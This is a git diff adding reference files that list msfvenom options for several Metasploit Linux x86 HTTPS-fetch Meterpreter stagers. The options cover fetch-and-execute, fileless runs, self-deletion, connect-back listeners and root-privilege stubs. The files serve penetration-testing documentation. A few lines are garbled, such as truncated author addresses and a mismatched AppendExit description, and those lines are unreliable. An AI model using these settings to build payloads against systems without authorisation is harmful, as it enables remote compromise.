diff --git a/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-find_tag.txt b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-find_tag.txt new file mode 100644 index 0000000..29deb88 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-find_tag.txt @@ -0,0 +1,106 @@ + + Name: HTTPS Fetch, Find Tag Stager + Module: payload/cmd/linux/https/x86/meterpreter/find_tag + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 104 + +Evasion options for payload/cmd/linux/https/x86/meterpreter/find_tag: +========================= + +@rapid7.com> + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME pCMqNuEK no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Use an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + TAG ywM2 yes The four byte tag to signify the connection. + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-reverse_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-reverse_ipv6_tcp.txt new file mode 100644 index 0000000..bb1a595 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-reverse_ipv6_tcp.txt @@ -0,0 +1,115 @@ + + Name: HTTPS Fetch, Reverse TCP Stager (IPv6) + Module: payload/cmd/linux/https/x86/meterpreter/reverse_ipv6_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 107 + +Evasion options for payload/cmd/linux/https/x86/meterpreter/reverse_ipv6_tcp: +========================= + +7.com> + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SCOPEID 0 no IPv6 scope ID, for link-local addresses + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME gmHQDyrhu no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Connect back to attacker over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-reverse_nonx_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-reverse_nonx_tcp.txt new file mode 100644 index 0000000..2522f88 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-reverse_nonx_tcp.txt @@ -0,0 +1,113 @@ + + Name: HTTPS Fetch, Reverse TCP Stager + Module: payload/cmd/linux/https/x86/meterpreter/reverse_nonx_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 116 + Rank: +Evasion options for payload/cmd/linux/https/x86/meterpreter/reverse_nonx_tcp: +========================= + + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME eIIxUvaWthpy no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..681240b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-reverse_tcp.txt @@ -0,0 +1,116 @@ + + Name: HTTPS Fetch, Reverse TCP Stager + Module: payload/cmd/linux/https/x86/meterpreter/reverse_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 107 + +Evasion options for payload/cmd/linux/https/x86/meterpreter/reverse_tcp: +========================= + +pid7.com> + skape + egypt + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME cBFQtUZIp no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-reverse_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-reverse_tcp_uuid.txt new file mode 100644 index 0000000..451e8a3 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-reverse_tcp_uuid.txt @@ -0,0 +1,115 @@ + + Name: HTTPS Fetch, Reverse TCP Stager + Module: payload/cmd/linux/https/x86/meterpreter/reverse_tcp_uuid + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 113 + Rank: +Evasion options for payload/cmd/linux/https/x86/meterpreter/reverse_tcp_uuid: +========================= + + skape + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME bWINkGebCEL no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter_reverse_http.txt new file mode 100644 index 0000000..20762e6 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter_reverse_http.txt @@ -0,0 +1,109 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/x86/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total 